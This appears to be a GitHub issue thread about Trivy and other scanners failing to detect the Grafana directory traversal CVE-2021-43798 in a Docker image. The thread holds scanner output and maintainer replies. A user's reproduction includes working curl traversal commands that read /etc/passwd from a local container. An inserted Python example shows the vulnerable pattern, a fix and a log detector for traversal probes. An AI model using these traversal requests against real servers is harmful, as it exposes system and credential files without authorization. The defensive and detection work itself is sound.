Closed stefanlasiewski closed 2 years ago
I can confirm that this container version is vulnerable:
$ docker run --rm -d --name=grafana -p 3000:3000 grafana/grafana:8.2.1
94635778b7021e165ae5d1c88a6b5203ad10a527a6071ec4d64a2426b2550b3f
$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
94635778b702 grafana/grafana:8.2.1 "/run.sh" 7 seconds ago Up 6 seconds 0.0.0.0:3000->3000/tcp grafana
$ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../VERSION
8.2.1
$ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
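For readers who want to see the bug class behind the reproduction above, here is an added example (not code from the issue thread, from Grafana, or from Trivy). It puts the vulnerable pattern (joining a request path under a plugin directory without canonicalising it) beside a hardened resolver, and runs a simple detector over a few constructed access-log lines in a generic combined-log format; the plugin root path, the log format and the IP addresses are all constructed for illustration.

```python
"""Added example: CVE-2021-43798 bug class, hardened resolver, and log check.

Not code from the issue thread, Grafana or Trivy. Paths, log lines and
addresses below are constructed for illustration.
"""
import posixpath
import re
from urllib.parse import unquote

# Assumed (illustrative) location of plugin assets on disk.
PLUGIN_ROOT = "/srv/grafana/public/plugins"

PLUGIN_ID_RE = re.compile(r"^[A-Za-z0-9_-]+$")


def unsafe_resolve(root: str, plugin_id: str, rel: str) -> str:
    """Vulnerable pattern: concatenate and hand the result to the filesystem.

    Dot segments in `rel` are never removed, so the resulting path can
    point anywhere the server process may read.
    """
    return f"{root}/{plugin_id}/{rel}"


def safe_resolve(root: str, plugin_id: str, rel: str):
    """Hardened resolver: decode, canonicalise, then confine to the plugin dir.

    Returns the canonical path, or None when the request would escape
    <root>/<plugin_id>/ (including an absolute path smuggled in via `rel`).
    """
    if not PLUGIN_ID_RE.match(plugin_id):
        return None
    base = posixpath.join(root, plugin_id)
    candidate = posixpath.normpath(posixpath.join(base, unquote(rel)))
    # Require a strict child of the plugin directory; the directory itself
    # and anything outside it are rejected.
    if not candidate.startswith(base + "/"):
        return None
    return candidate


# Constructed access-log lines (combined log format) for the detector.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /public/plugins/mysql/img/mysql_logo.svg HTTP/1.1" 200 1453
10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /public/plugins/mysql/../../../../../VERSION HTTP/1.1" 200 6
10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /public/plugins/mysql/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/VERSION HTTP/1.1" 200 6
10.0.0.5 - - [10/Dec/2021:12:00:04 +0000] "GET /api/health HTTP/1.1" 200 47
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[0-9.]+"'
)


def is_traversal_attempt(raw_path: str) -> bool:
    """True when the request path carries a '..' segment in any decoding.

    Browsers normalise dot segments before sending, so a '..' segment in a
    logged asset request is a strong signal of a deliberate traversal probe.
    The raw request line is checked as logged, after one decode and after a
    second decode, because logs record the undecoded request.
    """
    path = raw_path.split("?", 1)[0]
    once = unquote(path)
    twice = unquote(once)
    return any(".." in form.split("/") for form in (path, once, twice))


def find_traversal_attempts(log_text: str):
    """Return (client_ip, raw_path) for every log line flagged as traversal."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and is_traversal_attempt(m.group("path")):
            hits.append((m.group("ip"), m.group("path")))
    return hits


if __name__ == "__main__":
    print("unsafe :", unsafe_resolve(PLUGIN_ROOT, "mysql", "../../../../../VERSION"))
    print("safe   :", safe_resolve(PLUGIN_ROOT, "mysql", "../../../../../VERSION"))
    for ip, path in find_traversal_attempts(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: {path}")
```

The resolver rejects the request rather than trying to sanitise it, because canonicalising and then confining the result to the plugin directory is simpler to reason about than stripping dot segments; the detector deliberately decodes twice so that a percent-encoded probe is caught as well as the plain form seen above.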
@knqyf263 I suspect Grafana is not installed through a package manager, but it's deployed as a binary, which currently Trivy does not support?
@stefanlasiewski thanks for your report! let me investigate it.
@jerbia you're right, Grafana is deployed as a binary, and trivy doesn't detect it.
@afdesk Interesting. Is there a way for Trivy to detect this? Does Trivy look at the md5 sums of installed binaries, for example?
For the record, docker scan (which uses Snyk) doesn't find the vulnerability either:
$ docker scan --severity medium grafana/grafana:8.2.1
Testing grafana/grafana:8.2.1...
Organization: stefanlasiewski
Package manager: apk
Project name: docker-image|grafana/grafana
Docker image: grafana/grafana:8.2.1
Platform: linux/amd64
Base image: grafana/grafana:8.2.1
Licenses: enabled
✓ Tested 34 dependencies for known issues, no vulnerable paths found.
Base Image Vulnerabilities Severity
grafana/grafana:8.2.1 11 0 critical, 0 high, 0 medium, 11 low
Recommendations for base image upgrade:
Minor upgrades
Base Image Vulnerabilities Severity
grafana/grafana:8.3.2 0 0 critical, 0 high, 0 medium, 0 low
And neither does Anchore's SBOM method with syft/grype
(FTR: Grype's issue is at https://github.com/anchore/grype/issues/534 )
$ grype -q grafana/grafana:8.2.1
NAME INSTALLED FIXED-IN VULNERABILITY SEVERITY
busybox 1.33.1-r3 1.33.1-r4 CVE-2021-42374 Medium
busybox 1.33.1-r3 1.33.1-r5 CVE-2021-42375 Medium
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42378 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42379 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42380 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42381 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42382 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42383 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42384 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42385 High
busybox 1.33.1-r3 1.33.1-r6 CVE-2021-42386 High
github.com/cortexproject/cortex v1.8.2-0.20210428155238-d382e1d80eaf GHSA-jphm-g89m-v42p Medium
github.com/google/flatbuffers v1.12.0 CVE-2020-35864 High
github.com/grafana/loki v1.6.2-0.20210520072447-15d417efe103 GHSA-grj5-8x6q-hc9q Medium
github.com/grafana/loki v1.6.2-0.20210520072447-15d417efe103 CVE-2021-36156 Medium
github.com/prometheus/prometheus v1.8.2-0.20210621150501-ff58416a0b02 CVE-2019-3826 Medium
google.golang.org/protobuf v1.27.1 CVE-2015-5237 High
ssl_client 1.33.1-r3 1.33.1-r4 CVE-2021-42374 Medium
ssl_client 1.33.1-r3 1.33.1-r5 CVE-2021-42375 Medium
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42378 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42379 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42380 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42381 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42382 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42383 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42384 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42385 High
ssl_client 1.33.1-r3 1.33.1-r6 CVE-2021-42386 High
@stefanlasiewski in this case, trivy detected and checked two binary files, grafana-cli and grafana-server (containing three medium vulnerabilities).
But the app is a scope of files... need to think over it.
Maybe I missed something.
Thanks for your investigation!
This issue is stale because it has been labeled with inactivity.
Hi @afdesk Do you happen to have any fixes in mind for this? It's still happening on Trivy 0.23.
stefanl@stefanl:~ $ docker run --rm -d --name=grafana -p 3000:3000 grafana/grafana:8.2.1
stefanl@stefanl:~ $ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../VERSION
8.2.1
stefanl@stefanl:~ $ curl --path-as-is http://localhost:3000/public/plugins/mysql/../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/ash
...
stefanl@stefanl:~ $ trivy --version
Version: 0.23.0
This issue is stale because it has been labeled with inactivity.
Description
Grafana issued a notice about CVE-2021-43798: Grafana directory traversal this week. It affects all Grafana 8.x instances.
https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/
However, Trivy doesn't seem to be picking it up. Why is this?
What did you expect to happen?
I expect this command to list CVE-2021-43798:
What happened instead?
It doesn't list this CVE:
Output of run with -debug:
Output of trivy -v:
Additional details (base image name, container registry info...):
n/a